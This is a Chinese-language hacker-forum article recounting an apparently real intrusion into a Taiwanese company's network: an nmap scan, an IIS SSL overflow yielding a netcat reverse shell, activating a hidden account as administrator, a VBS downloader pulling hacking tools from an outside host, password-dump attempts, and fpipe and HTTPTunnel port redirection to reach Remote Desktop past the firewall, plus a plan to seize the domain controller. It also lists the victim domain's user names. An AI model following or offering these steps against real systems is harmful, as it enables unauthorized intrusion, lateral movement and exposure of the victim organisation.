对内网有端口转发的域的渗透

 http://hack.77169.com/HTML/20060423002346.html?jdfwkey=smxty1

 

现在管理员的安全意识越来越高，值得庆祝，可惜大多是国外和TW的，国内倒没见几个管理员能配置出很BT的服务器，本文就是针对的一系列服务器配置情况（按我自己的理解），配置算比较BT的，一起来看看我们如何入侵它吧！
预想配置：
A. 配置防火墙。
B. 做Port过滤。
C. 禁止非过滤端口访问网络。
D. 远程管理限定IP。
E. 等等等等，暂时没有想到的适应此方法的配置，欢迎大家看完本文后补充。
本文作为例子的这台服务器的配置可能有些特殊，上面的配置是我自己根据进入的机器，查看其环境来说的，不对之处请大家指出，下面正式开始艰难地Attack之路。

先用NMAP看看服务器情况：
C:/>nmap -sS -P0 xxx.xxx.xxx.xxx

Starting nmap 3.50 ( http://www.insecure.org/nmap ) at 2004-05-31 19:41 中国标准时间
Interesting ports on xx-xx-xx-xx.HINET-IP.hinet.net (xxx.xxx.xxx.xxx):
(The 1653 ports scanned but not shown below are in state: filtered)
PORT STATE SERVICE
21/tcp open ftp
25/tcp open smtp
80/tcp open http
110/tcp open pop3
443/tcp open https
3389/tcp open ms-term-serv

Nmap run completed -- 1 IP address (1 host up) scanned in 83.560 seconds
扫描出xxx.xxx.xxx.xxx此服务器有IIS SSL远程溢出漏洞，利用SSL EXP远程溢出成功后得到里边的网络环境，通过“ipconfig /all”可以发现Host Name是“lsiiwww”，具体情况请看下表（经过删减）：
C:/WINNT/system32>ipconfig /all
ipconfig /all
Windows 2000 IP Configuration
Host Name . . . . . . . . . . . . : lsiiwww
Primary DNS Suffix . . . . . . . : lucybelle
Node Type . . . . . . . . . . . . : Broadcast
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
DNS Suffix Search List. . . . . . : lucybelle.
com
Ethernet adapter 跋办硈絬 2:
Physical Address. . . . . . . . . : 00-E0-7D-F8-23-0F
IP Address. . . . . . . . . . . . : 192.168.1.81
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . :
DNS Servers . . . . . . . . . . . :
Ethernet adapter 跋办硈絬:
Physical Address. . . . . . . . . : 00-01-29-60-21-EC
DHCP Enabled. . . . . . . . . . . : No
IP Address. . . . . . . . . . . . : 192.168.0.81
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.0.1
DNS Servers . . . . . . . . . . . : 192.168.0.80
然后看看网络情况“Tracert www.hinet.net”：
C:/WINNT/system32>tracert www.hinet.net
tracert www.hinet.net
Tracing route to www.hinet.net [61.219.38.89]
over a maximum of 30 hops:
1 <10 ms <10 ms <10 ms 192.168.0.1
2 <10 ms <10 ms <10 ms 61.219.91.177
3 47 ms 47 ms 47 ms 10.219.9.254
4 47 ms 47 ms 47 ms ty-fo-c6r1.router.hinet.net [168.95.94.194]
5 47 ms 47 ms 47 ms ty-fo-c12r2.router.hinet.net [211.22.39.130]
6 47 ms 47 ms 47 ms tp-s2-c12r2.router.hinet.net [210.65.200.234]
7 47 ms 47 ms 46 ms tp-s2-c6r9.router.hinet.net [211.22.35.129]
8 47 ms 47 ms 47 ms 61-219-38-89.hinet-ip.hinet.net [61.219.38.89]
Trace complete.
可以看出是通过网关出去的，但也可能本机有公网IP。看本机服务开了3389，本来以为此次渗透就结束了，因为有了Termianl服务可以利用远程终端连接过去就可以得到GUI界面剩下的事情就简单了，但接着我用终端连接上去，居然出现的是 XP的登陆界面，如图1所示。

图1
IP地址输入错误？不对，查看SSL反向连接过来的IP地址：
C:/>nc -vv -l -p 80
listening on [any] 80 ...
connect to [192.168.4.100] from xxx.xxx.xxx.xxx.hinet.net [xxx.xxx.xxx.xxx] 6
1041
Microsoft Windows 2000 [セ 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
IP没错啊！仔细想想原因……
根据XP登陆界面可以初步判断此服务器位于一个域内，这就好办了，我先在进入的那台服务器上激活一个帐户，然后利用这个帐户登陆这台XP的机器，因为是域所以有了一台机器的一个域用户的密码，即可以用这个域用户登陆这台机器所在的域所有的机器！试下去！
激活TsInsternetUser帐户，然后添加它到Administrators组，试着用TsInternetUser 用户登陆XP结果失败，被进入的机器不是域控制器。用“net user /domain”命令看这台机器的用户，就大致确定这台机器不是一个域控制器了。
C:/WINNT/system32>net user /domain
net user /domain
硂兜璶―穦呼办 lucybelle.com.tw 呼办北矪瞶
//lsiiweb.lucybelle.com.tw ㄏノ眀め
--------------------------------------------------------------------
Administrator amanda ann
cctim coral gigi
Guest IUSR_LSIIWEB IWAM_LSIIWEB
jan kaka katy
krbtgt long macy
mine peggy roger
stella tiffany tseng
TsInternetUser tsuenyu vivianhsieh
wu wukl yunyun
磅︽Ч拨祇ネ┪岿粇
既然无法登陆，那就先看看本地机器有没有管理员登陆，如果有人登陆，利用几个小工具把他的密码Dump出来就可以登陆XP的机器了。于是在目标机器上写入一个Down.vbs，Down.vbs的使用方法是“c:>cscript down.vbs http://www.hacker.com.cn/hacker.exe hacker.exe”,意思就是主动去下载www.hacker.com.cn上的Hacker.exe文件，然后放到本地，名字依然是Hacker.exe，这个方法防火墙很少挡连，因为出去的是80端口。利用这个VBS下载Findpass和Pulist工具，以后的下载也是利用此VBS。执行Pulist结果居然发现没有用户登陆，看来这条路走不通了。
终端连接xxx.xxx.xxx.xxx机器，结果却是XP的终端，但是我进入的却是Windows 2000[192.168.1.81]的机器，在Windows 2000机器上查找主页文件，其WEB目录在D:/web 下，证明了我心中的猜想：可能是做了端口映射，XP机器的80和443端口直接映射到 Windows2000机器的80和443端口。我的访问就是这样的过程了：
Me  xxx.xxx.xxx.xxx [xp os] -> XP port map -> windows 2000 80 port
根据NMAP扫描端口的结果，此服务器还开了21，25，110，3389等端口，但是在Windows2000机器上没有开放25，110端口，所以我猜测是XP机器自己就开了Mail服务或者映射到别的内网机器上去了！
现在我给他来招毒的：利用Fpipe重定向端口，在Windows2000机器上执行如下命令：
fpipe -l 80 -s 53 -r 3389 192.168.1.81
意思是将发到本机80端口的连接通过53端口连接到192.168.1.81的3389端口，如果成功我可以连接这个IP的80端口，然后Fpipe把连接转向到本地端口3389！想法不错，可是执行Fpipe的结果直接导致了IIS挂掉，利用SSL EXP获得的Shell也挂掉了，再次溢出的时候提示无法连接到443端口，仰天大哭！后来在实践中发现可以利用Fpipe来端口重定向，但必须要先停止那个80端口，吃一亏长一智了。
第二天管理员重新启动了机器，我才有机会重新利用EXP进去，幻想管理员登陆在上边，我好直接Dump其密码，结果是白日做梦，管理员根本不在。难道没有别的方法来进入这台机器么？在我第一天把机器的IIS搞当后，整整一夜我都在想该如何才可以完全控制这台机器，后来还真被我想到了一点：用Httptunnel！

TIPS：什么是HTTPTunnel？
通常HTTPTunnel被称之为HTTP暗道，它的原理就是将数据伪装成HTTP的数据形式来穿过防火墙，实际上是在HTTP请求中创建了一个双向的虚拟数据连接来穿透防火墙，HTTPTunnel的优点就在于即使他的机器以前80端口开着，现在这么用也不会出现什么问题，正常的WEB访问仍然走老路子，重定向的隧道服务也畅通无阻。

利用Httptunnel把本地9898端口定向到远程主机80端口：
htc -F 9898 xxx.xxx.xxx.xxx:80
把目标机器的80端口定向到本地主机的3389端口：
hts -F localhost:3389 80
再用3389终端连接目标机器，理论上是这样的传输流程：
Local 3389 mstsc->localhost 9898(Httptunnel)map->server xxx.xxx.xxx.xxx 80 map->windows 2000 80(Httptunnel)map->windows 2000 3389
事实证明，利用Httptunnel是成功的：在本地执行Httptunnel客户端：
C:/>htc -F 9898 xxx.xxx.xxx.xxx:80
目标机器执行Httptunnel服务端：
C:/WINNT/system32>hts -F localhost:3389 80
hts -F localhost:3389 80
本地利用终端程序连接本地IP：9898，如图2所示。

图2
连接上去了，2000机器终端应该是这样的嘛。走到这一步，此次渗透就结束了，因为得到了一台机器的GUI权限，以后的操作相对简单：
A. 利用这台机器作为据点，扫描其内网其他机器，找出其域控制器。
B. 在此台机器安装Sniffer监听。
C. 获取其某个域用户帐户密码。
D. 攻破域控制器。
E. 所有的机器被告被控制，此次渗透结束。
大体上来讲，这次入侵是比较曲折的，虽然很简单就溢出了，但是控制整个内网却是比较麻烦的事，特别是几次端口转发更是弄得湖里糊涂，很容易把思路混淆，所以这里给广大喜欢安全的朋友们讲一声：“在入侵前请先问自己：我的目标是什么？我要怎么拿到？！”确定了目标，一切庞杂的东西都将不再成为我们的阻碍，一切都简单了。